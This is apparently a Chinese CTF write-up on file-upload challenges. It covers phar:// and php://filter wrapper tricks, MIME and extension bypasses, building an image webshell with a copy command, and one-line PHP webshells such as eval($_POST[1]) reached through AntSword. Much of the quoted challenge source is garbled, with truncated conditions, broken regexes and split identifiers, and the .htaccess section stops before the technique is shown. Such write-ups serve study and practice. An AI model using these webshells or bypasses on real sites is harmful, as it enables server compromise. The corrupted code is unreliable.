CTF文件上传相关小结

最近刷了几道文件上传的题，其中包括 js 绕过、.htaccess 上传、phar 绕过，文件上传的题目一般都是黑盒，白盒审计很少，奇奇怪怪的东西还是挺多的。就我自己来说，做这种题一般都是各种都试试，基本上都能出来。

姿势一：Pr绕过上传限制

进行压缩，之后把 rar 的后缀名改成 jpeg 格式

首先我们在本地测试一下: 准备一句话木马

test.php

index.php可以看到，是可以执行的。

安恒月赛：image_up

首先我们把源码读出来:

这里是利用伪协议读取源码/index.php?page=php://filter/read=convert.base64-encode/resource=index.php

index.php

<?php if(isset($_GET['page'])){ if(!stristr($_GET['page'],"..")){$page = $_GET['page'].".php";include($page);}else{header("Location: index.php?page=login"); }}else{header("Location: index.php?page=login");}

login.php

<?php if(isset($_POST['username'])&&isset($_POST['password'])){header("Location: index.php?page=upload");exit(); }?>

upload.php

<?php $error = "";$exts = array("jpg","png","gif","jpeg"); if(!empty($_FILES["image"])){$temp = explode(".", $_FILES["image"]["name"]);$extension = end($temp); if((@$_upfileS["image"]["size"] if(in_array($extension,$exts)){$path = "uploads/".md5($temp[0].time()).".".$extensmove_uploaded_file($_FILES["image"]["tmp_name"], $p $error = "上传成功!";} else{$error = "上传失败!"; }}else{$error = "文件过大，上传失败!";} }?>

这道题就是利用 phar 伪协议去包含我们写好的一句话

具体做法: 木马文件打包成压缩包，然后改后缀，再利用 phar 伪协议读取

phar://./uploads/4h214215521321.jpg/1

最后用蚁剑链接就可以拿到 flag

姿势二：js绕过

例题一查看源码之后发现文件上传，图片马

先来做一个吧

合成图片马的命令:copy 1.png /b + 1.txt /a 2.png我们先来上传一个一句话木马吧，这里发现是能够上传成功的，但是不解析，最后利用 JS 绕过 payload:

system(“ls”)

利用 file 读取上传的文件，发现是解析 php 文件的
查看文件名发现有 flag 相关文件，直接读就出
例题二：安恒 A 计划

先附上源码吧

index.php

?phperror_reporting(0); highlight_file(__FILE__);$file = $_GET['file'];if (preg_match("/flag/", $file)){die('Oh no!'); }include $file;?>

file_up1oad.php

<?php error_reporting(0); date_default_timezone_set('PRC'); if(isset($_FILES['file'])) {$file_name = basename($_FILES["file"]["name"]);$file_ext = pathinfo($file_name,PATHINFO_EXTENSION); $file_type = $_FILES['file']['type'];$file_content = $_FILES['file']['tmp_name']; if(in_array($file_ext, ['php', 'php3', 'php4', 'php5', 'phtml', 'pht'])) {die('Php file ?');}if (!in_array($file_type, ['image/jpeg', 'image/gif', 'image/ png'])){die('Bad file'); }if (preg_match("/die('Bad file of content !'); }if (!file_exists('uploads')){ mkdir('uploads');}$new_filename = md5(time()).'.'.$file_ext;$u = move_uploaded_file($_FILES['file']['tmp_name'], './uploads/' . $new_filename); if ($u){echo 'Successful'."n";echo '/uploads/'.$new_filename; }}?>
File uploadFilename:
 

审计了一下，估计也就是 js 合成个图片马php 文件:

 system( 'ls'); 

合成木马直接上传，

/index.php/?file=/var/www/html/uploads/62bfd63a7b411adea7a484c88cbaed0d.png

利用一下文件包含
直接查看 flag 文件
例题三：[GXYCTF2019]BabyUpload

eval ($_POST[1]);

合成图片马:

直接上传蚁剑连接源码:

<?php session_start();echo "上传文件 ";error_reporting(0); if(!isset($_SESSION['user'])){$_SESSION['user'] = md5((string)time() . (string)rand(100, 10 00));}if(isset($_FILES['uploaded'])) {$target_path = getcwd() . "/upload/" . md5($_SESSION['user']) ;$t_path = $target_path . "/" . basename($_FILES['uploaded'][' name']);$uploaded_name = $_FILES['uploaded']['name'];$uploaded_ext = substr($uploaded_name, strrpos($uploaded_nam e,'.') + 1);$uploaded_size = $_FILES['uploaded']['size']; $uploaded_tmp = $_FILES['uploaded']['tmp_name'];if(preg_match("/ph/i", strtolower($uploaded_ext))){ die("后缀名不能有 ph!");} else{if ((($_FILES["uploaded"]["type"] == "") || ($_FILES["uploaded"]["type"] == "image/jpeg") || ($_FILES["uploaded"]["type"] == "image/pjpeg")) && ($_FILES["up loaded"]["size"] $content = file_get_contents($uploaded_tmp); if(preg_match("/die("诶，别蒙我啊，这标志明显还是 php 啊"); }else{mkdir(iconv("UTF-8", "GBK", $target_path), 0777,true);move_uploaded_file($uploaded_tmp, $t_path); echo "{$t_path} succesfully uploaded!";}} else{die("上传类型也太露骨了吧!"); }} }?>

姿势三：.htaccess上传

我们把 content-type 改成 image/jpeg 格式发现上传成功，下一步就是传图片马源码: index.php

<?php session_start();echo "
 ";if(!isset($_SESSION['user'])){$_SESSION['user'] = md5((string)time() . (string)rand(100, 10 00));}?>

upload.php

<?php session_start();echo ""; if(!isset($_SESSION['user'])){$_SESSION['user'] = md5((string)time() . (string)rand(100, 10 00));}if(isset($_FILES['uploaded'])) {$target_path = getcwd() . "/upload/" . md5($_SESSION['user']) ;$t_path = $target_path . "/" . basename($_FILES['uploaded'][' name']);$uploaded_name = $_FILES['uploaded']['name'];$uploaded_ext = substr($uploaded_name, strrpos($uploaded_nam e,'.') + 1);$uploaded_size = $_FILES['uploaded']['size']; $uploaded_tmp = $_FILES['uploaded']['tmp_name'];if(preg_match("/ph/i", strtolower($uploaded_ext))){ die("我扌 your problem?");}else{if ((($_FILES["uploaded"]["type"] == "") || ($_FILES["uploaded"]["type"] == "image/jpeg") | | ($_FILES["uploaded"]["type"] == "image/pjpeg")|| ($_FILES["uplo aded"]["type"] == "image/png")) && ($_FILES["uploaded"]["size"] 2048)){mkdir(iconv("UTF-8", "GBK", $target_path), 0777, true)move_uploaded_file($uploaded_tmp, $t_path);echo "{$t_path} succesfully uploaded!"; }else{die("我扌 your problem?");}}}